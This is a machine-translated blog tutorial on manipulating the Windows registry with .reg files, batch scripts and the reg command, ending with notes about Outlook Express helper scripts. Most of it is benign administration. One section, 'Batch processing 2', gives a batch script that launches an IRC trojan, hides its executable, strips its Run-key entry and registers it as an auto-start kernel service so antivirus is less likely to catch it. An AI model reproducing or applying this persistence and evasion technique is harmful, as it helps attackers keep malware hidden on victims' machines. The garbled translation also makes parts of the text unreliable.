One, batch generation. REG file Operations Registry
You can easily generate. reg files by using the redirection symbols in batch processing. Then use the command to execute the. reg file!
Here, focus on how the. reg file operates the registry.
First the. reg file must be the first line: Windows Registry Editor Version 5.00. The contents of the registry are then manipulated.
(Consistent with the file format exported from the registry)
1, create subkeys
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
A subkey with the name "TTT" was created under hkey_local_machine\software\.
2, create a project name
Copy Code code as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
"Name" = "TTT BLOG"
"EMail" = "taoether@gmail.com"
"URL" = "http://www.taoyoyo.net/ttt/"
"Type" =dword:02
So under [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] NEW: Name, EMail, URL, type four items
The type of Name, Email, URL is "String Value"
Type is "DWORD Value"
(Attached: Windows registry value type:
REG_SZ String Value
REG_BINARY Binary Value
REG_DWORD DWORD Value
REG_MULTI_SZ Multiple String values
REG_EXPAND_SZ Expandable String value)
3, modify the key value
The modification is relatively simple, just export the item you need to modify, then modify it with Notepad, then import (regedit/s). Just like a new one. You can modify multiple items under the same subkey at once.
4, delete the project name
Copy Code code as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
"EMail" =-
Execute the script, "EMail" was deleted;
5, delete subkeys
Copy Code code as follows:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
[-HKEY_LOCAL_MACHINE\SOFTWARE\DDD]
Executing the script, the subkey TTT and DDD have been deleted.
6,.reg File Execution method
1) Direct execution of REG file
2) regedit/s *.reg (S/s not confirmed)
3) Reg Import *.reg
7, in fact, we can also use DLL files instead of reg files.
Batch Case 1:
Copy Code code as follows:
@echo off
echo Windows Registry Editor Version 5.00 >t1.reg
Echo.
echo [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] >>t1.reg
echo "Name" = "TTT BLOG" >>t1.reg
echo "EMail" = "taoether@gmail.com" >>t1.reg
echo "URL" = "http://www.taoyoyo.net/ttt/" >>t1.reg
echo "Type" =dword:02 >>t1.reg
REGEDIT/S T1.reg
del/q T1.reg
Pause
Batch processing 2: (This example is someone else's, not very understand say ~ ~)
We are now using some of the older Trojans that may be in the registry [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\currentversion\run (Runonce, RunServices , runexec)] below generates a key value to realize the Trojan's self startup. But this is very easy to expose the path of the Trojan, which led to the killing of Trojans, relatively if the Trojan program registered as a system service is relatively safe. For example, configure a good IRC trojan Dsnx ( Known as Windrv32.exe)
Copy Code code as follows:
@start Windrv32.exe
@attrib +h +r Windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "Windsnx" =->>patch.dll
@sc. exe create windriversrv type= kernel start= auto displayname= windowsdriver binpath=
@regedit/S Patch.dll
@delete Patch.dll
@REM [Deletes Dsnxde in the registry, Sc.exe it as a system critical service while setting its properties to hidden and read-only, and config to self-start]
@REM This is not a safer ^_^.
Second, reg command operation registration Form
The Reg command is a tool provided by Windows to specifically manipulate the registry. can be convenient to query, add, delete, import, export, comparison and other operations. Specific can refer to the help of the system ...
REG Operation [Parameter list]
Operation [QUERY | ADD | DELETE | COPY |
SAVE | LOAD | UNLOAD | RESTORE |
COMPARE | EXPORT | IMPORT]
1, query all subkeys and values
D:\>reg Query Hklm\software\ttt
! Reg. EXE VERSION 3.0
Hkey_local_machine\software\ttt
Name REG_SZ TTT BLOG
EMail REG_SZ taoether@gmail.com
URL REG_SZ http://www.taoyoyo.net/ttt/
Type REG_DWORD 0x2
2, query for specific items
D:\>reg Query hklm\software\ttt/v URL
! Reg. EXE VERSION 3.0
Hkey_local_machine\software\ttt
URL REG_SZ http://www.taoyoyo.net/ttt/
The hardest part here is how to get the string we want, confused for a long time, and finally find a way.
There is no other good way, can only use find,for cycle to intercept the content we need. (For the following example if you do not understand, please refer to this blog for another article: dos Loop-bat/batch processing for command Details II)
For example, we want to get the key value of the URL: http://www.taoyoyo.net/ttt/, you can use the following script:
Copy Code code as follows:
@ECHO off
for/f "tokens=1,2,3,4,*"%%i in (' reg query ' hkey_local_machine\software\ttt ' ^| find/i ' URL "') do SET" Purl=%%k "
The URL value for the Echo TTT blog is:%purl%
Save As Test.bat, the results of the operation are as follows:
D:\>test.bat
The URL value of the TTT blog is: http://www.taoyoyo.net/ttt/
No, the home computer for some reason, in the command line to run a "reg" command (including REG/?), the CPU occupies 100%, see Task Manager, cmd occupy more than 80%, do not know why ...
There is no problem running other commands, including regedit/s ...
Check it out, there is said on the internet is the cause of the Trojan, but check a bit, nor like. There is no problem finding the relevant files and running other commands ...
First do not do, just have a reg command detailed, and so will tidy up!
Because of the drug, with their own clear.bat clean up the C disk, incredibly clean out the space of 1 G, the original only hundreds of trillion. Windows garbage really much AH ~ ~ Don't forget to often clean up ah!
Then released two batch files, you can automatically monitor Outlook Express, there is a need to click to download ...
1,oemonitorcount.bat function: You can reset the number of OE opened in the registry, avoid more than 100 times when prompted compression
2,oemonitorsize.bat function: You can monitor the Outlook Express Mail file (*.dbx) size and generate an alert log when it is larger than the specified size.
These two files, can be added to the Startup group, each boot automatically run!
These two are mainly to solve some of the problems that the company often appears:
1 frequently someone's mail file more than a few g;
2 Sometimes the message can be lost if it is compressed according to the prompts.
Just found that after downloading the file added "htm" suffix, please remove the prefix and then use!
Additional download, please use the following links, such as: Thousands of brain telecommunications high-speed download address, the Millennium Netcom high-speed download address. The VIP link above is for the use of thousands of brain users ~ ~
